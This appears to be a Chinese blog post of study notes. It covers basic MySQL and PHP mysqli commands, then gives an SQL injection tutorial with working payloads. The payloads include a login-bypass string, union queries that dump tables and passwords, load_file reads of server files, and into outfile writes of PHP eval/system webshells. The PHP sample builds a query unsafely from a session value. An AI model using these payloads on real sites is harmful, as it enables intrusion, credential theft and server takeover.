MySQL命令\注入

已于 2022-08-17 11:25:26 修改
阅读量1.4k 收藏 1
点赞数 2
分类专栏: Web 文章标签: 数据库 mysql sql web安全
于 2022-07-25 01:31:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46928280/article/details/125966643
版权

MySQL使用B+树来存储数据,有两种存储引擎MyISAMInnoDB。INNODB:利用非叶子节点来存储索引,叶子节点来存储数据;MYISAM:利用非叶子节点来存储索引,叶子结点来存储数据的指针,数据是单独存储的。

mysql的基本操作

一.登录MySQL

1.登录指定IP的root用户

mysql -h 199.199.10.1 -u root -p
Enter password:******

2.默认登录本机(推荐这种方法登录)

mysql -u root -p
Enter password:******

3.直接进入到指定数据库的登录方法

mysql -u root -p databaseName
Enter password:******

二.基本命令

2.1 数据库的基本操作

1. 查看所有的数据库:

show database;

2. 创建数据库:

create database databaseName;

3. 进入到指定的数据库:

use databaseName;

4. 查看当前所在的库:

select database();

5. 查看建库语句:

show create datebase databaseName;

6. 删除指定数据库:

drop database databaseName;

7. 退出Mysql数据库:

1. exit
2.\q
3.quit

2.2 数据表的基本操作

1. 查看库中的所有数据表:

show tables;

2. 创建数据表:

注意:创建表时,字符类型必须要设定长度,最后一个字段后面不能写逗号。

create table tableName(
    字段1 字段数据类型,
    字段2 字段数据类型,
    字段3 字段数据类型
);

3. 查看表的结构:

desc tableName;

4. 查看建表语句:

show create table tableName;

5. 查看表中的数据:

select * from tableName;

//查看另一个库中表的数据表
select * from databaseName.tableName;

6. 删除数据表:

drop table tableName1,tableName2,tableName...;

7. 添加字段:

#1.不指定添加字段的位置:【默认在最后】

alter table tableName add 字段名 字段数据类型;

#2.指定添加在某个字段的后面【after】

alter table tableName add 字段名 字段数据类型 after 前一个字段;

#3.添加在表的最前面【first】

alter table tableName add 字段名 字段数据类型 first;

8. 修改字段:

#1. 修改原来字段的数据类型:

alter table tableName modify 字段名  字段数据类型;

#2. 修改原来的字段名,包括数据类型:

alter table tableName change 原字段名 新字段名 字段数据类型;

#3. 给已有的字段添加主键

alter table tableName add primary key (字段名);

9. 删除字段:

alter table tableName drop 字段名;

10. 数据表从命名:

alter table 原表名 rename 新表名;

2.3 数据的基本操作

1. 在表中添加数据:

#1.对所有的字段添加数据:

insert into tableName values (字段1数据,字段2数据,字段...数据);

#2.对指定的字段添加数据:

insert into tableName (字段1,字段3,字段5) values (字段1数据,字段3数据,字段5数据);

2. 删除表中数据:

#1.删除表中所有数据(尽量不用):

delete from tableName;

#2.按条件删除指定数据:

delete from tableName where 条件;

#3.如果字段是自增属性,用以上两种方法删除数据后插入数据时仍然按删除之前自增

truncate table tableName;

3. 修改表中数据:

update tableName set 字段1=新值,字段2=新值 where 条件;

2.4 其它基本命令

\h  ---快捷帮助
\c  ---取消命令输入
\s  ---查看当前数据库的操作
\q  ---退出MySQL命令行
\G  ---以列的形式展示结果

tee 路径\文件夹 ---导出命令到本地文件

2.5 mysql常用函数

  • 系统用户名:system_user()
  • 用户名:user()
  • 当前用户名:current_user()
  • 连接数据库的用户名:session_user()
  • 数据库名:database()
  • MySQL版本号:version()
  • 读取服务器本地文件:load_file(根路径)
  • 向服务器写入文件:into outfile()
  • 读取数据库路径:@@datadir
  • MySQL安装路径:@@basedir
  • 操作系统:@@version_compile_os

三.PHP操作MySQL

1.连接数据库

$link = mysqli_connect('localhost', 'root', 'password');

2.设置数据库的编码格式

mysqli_set_charset($link, 'utf8');

3.选择连接的数据库

mysqli_select_db($link, 'mxf');

4.定义SQL语句

$sqlStr = "delete from users where username='{$_SESSION['username']}';";

5.发送并执行SQL语句

$res = mysqli_query($link, $sql);

6.关闭连接

mysqli_close($link);

mysql注入

一.判断是否存在注入点

1.SQL语句是否可以插入

  • 单引号截断:'
  • 双引号:"
  • 单引号或双引号加右括号:)

用此方法可以验证是否开了waf狗

2.是否可以进行union联查

语句结尾用and连接1=1(true)和1=2(false)进行调试;如果and 1=1时服务器反馈为真,and 1=2时服务器反馈为false,证明可以进行union联查

3.是否可以忽略应用程序的后续语句

  • 在URL中使用–+来注释后面的内容,这里的+好在URL中相当于空格
  • 在输入框中输入#来注释代码中后面的内容,不能在URL中使用,因为在URL中#代表锚点
  • 万能密码:admin’ or ‘1’='1

4.如果存在waf

  1. 在URL后面输入 / 报错
  2. 输在URL后面输入 -0 正常

二.爆破

1.获取数据库中的信息

①.获取一次可以显示的字段长度:

使用 order by 1,2,3… 来确定服务器返回的字段数,挨个去试,直到报错,报错前一个就是可以显示的字段数

②.获取数据库信息
  1. 查询当前所在的库:

select database()

  1. 查询数据库中的所有库:

select schema from information_schema

③.获取数据表

获取指定库下的表:select 1,1,group_concat(table_name) from information_schema.tables where table_schema='wuya'--+

④.获取表和字段

获取指定表中的字段: union select 1,1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='wuya'--+

⑤.获取表中数据

获取指定表中的数据: select group_concat(concat_ws(',',id,username,password) SEPARATOR '|') from users group by '1'

2.mysql读写函数的使用

①.load_file()函数
  • 该函数是用来读取源文件的函数
  • 只能读取绝对路径的网页文件
  • 在使用load_file()时应先找到网站绝对路径
  • 将绝对路径转换为16进制数时,不需要使用引号
  • 读取网站文件内容:
    and 1=2 union select 1,load_file('C:\\inetpub\\wwwroot\\mysql-sql\\inc\\set_sql.php'),3,4
②.into outfile
  • 可以写入一句话木马,然后使用蚁剑或者菜刀直接连接
    and 1=2 union select 1,"<?php @eval ($_POST['psword']);?>",3,4 into outfile 'D:/www/mysql-sql/shell.php'
  • system函数可以执行os命令,通过向指定文件中传入参数
    and 1=2 union select 1,"<?php @system($_GET['par']);?>",3,4 into outfile 'D:/www/mysql-sql/system.php'
    使用URL访问写入的指定文件,并传入参数:

www.xxxx.com/system.php?par=ipconfig

三.绕过(待补充)

1.关于魔术引号注入

  • 使用宽字节注入绕过魔术引号:%df%27
天才花道
关注
专栏目录
mysql注入提权命令
12-03
mysql注入提权命令 php类型的网站很多都存在MYSQL注入漏洞,而利用注入来获取权限的方法又多种多样。本文以mysql中支持的SCHEMATA库为例讲述mysql注入高级暴库用户密码
命令注入讲解ppt.pptx
08-10
命令注入讲解 命令注入是一种高危漏洞,指攻击者能够控制外部的参数达到随意执行系统命令的结果。命令执行漏洞不仅存在于 B/S 架构中,也存在于 C/S 架构中。本次讨论的都是 Web 中的命令执行漏洞。 命令注入攻击...
SQL注入命令执行
qq_50034496的博客
07-06 1505
SQL注入命令执行
sql注入 mysql 执行命令 sql注入以及解决的办法
最新发布
QQ3007250950的博客
07-23 1152
所以后面的where条件是一个恒等式,表所有的行都符合字符串1等于字符串1这个条件,又是或的关系,所以所有的行全部匹配,全部被搜索出来,这样再用行数来判断用户是否能登陆已经根本不行了,因为查出来的是所有行。这句超级简单吧,我们都知道,这句最常用的是在登陆的时候,来查询用户输入的账号和密码匹配不匹配,来确定用户是否可以登陆的,大体上一看好像没啥问题,但是呢,假如我是一名黑客,我可以用一种巧妙地方式来登陆你这个系统,我账号随意输入一个,密码我输入一个 1 ‘or’ 1’='1 什么意思呢?
mysql注入命令执行 | 提权
Sp4rkW的博客
03-01 4090
文章首发公众号:闪光的自留地 知乎:Sp4rkW GITHUB:Sp4rkW B站:一只技术君 博客:https://sp4rkw.blog.csdn.net/ 联系邮箱:getf_own@163.com 前言 这篇博客主要是最近面试遇到的
mysql 常用注入命令_SQL注入常用命令
weixin_28585773的博客
01-19 1219
1. 数据库查询版本Mssql select @@versionMysql select vresion()/select @@versionoracle select banner from ¥versionPostgresql select version()2. 数据库常用命令库操作连接数据库 mysql -u 用户名 -p创建数据库:create databa...
mysql 常用注入命令_sql注入之必备的基础知识
weixin_36299790的博客
01-26 514
什么是SQL注入(SQL Injection)所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。mysql常用注释#--[空格]或者是--+/*…*/在注意过程中,这些注释可能都需要进行urle...
MySQLSQL 注入
12-16
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对...
第01篇:MySQL注入点写WebShell的5种方式1
08-03
MySQL注入是一种常见的安全漏洞,它允许攻击者通过输入恶意SQL语句来操纵数据库。本文将探讨如何利用MySQL注入点写入WebShell的五种方法,重点关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入点至关重要...
PHP使用PDO实现mysql注入功能详解
12-20
本文将深入讲解如何使用PHP的PDO(PHP Data Objects)扩展来实现MySQL数据库的防注入功能。 1. **什么是SQL注入攻击?** SQL注入攻击是一种黑客利用恶意输入篡改SQL查询的方式,以获取未经授权的数据访问或控制...
Mysql数据库使用concat函数执行SQL注入查询
09-10
主要介绍了Mysql数据库使用concat函数执行SQL注入查询,concat函数在SQL注入查询中会有意想不到的作用,本文就起讲解它的使用,需要的朋友可以参考下
MySQL注入
leekos的博客,分享web安全相关知识~
12-06 855
MySQL注入
我的渗透笔记之sql注入mysql基本命令
xf555er的博客
03-18 288
要是有不理解可以加入渗透学习交流群:1084999372 首先了解一下mysql文件的基本操作: 创建mysql用户: CREATE USER 'username'@'host' IDENTIFIED BY 'password'; 读取文件: 写入文件: 注意:首先在mysql进行读取写入操作是需要权限的,先在mysql命令行输入show global variables like ‘%se...
sql注入 mysql 篇 详细使用方式
weixin_45425685的博客
03-20 1209
sql注入mysql
Mysql注入详细讲解
2401_84466359的博客
05-24 1384
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
SQL注入命令
小飞鸟
10-13 4234
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称 sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称 sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名 sqlmap...
Mysql临时执行系统命令
weixin_34418883的博客
01-09 678
mysql命令行中,有时间需要看下系统的时间和ip地址,不用退出mysql命令行或者重新开一个窗口只用执行 system + 系统命令即可比如 system ifconfig 转载于:https://blog.51cto.com/jwnlive/1350094...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值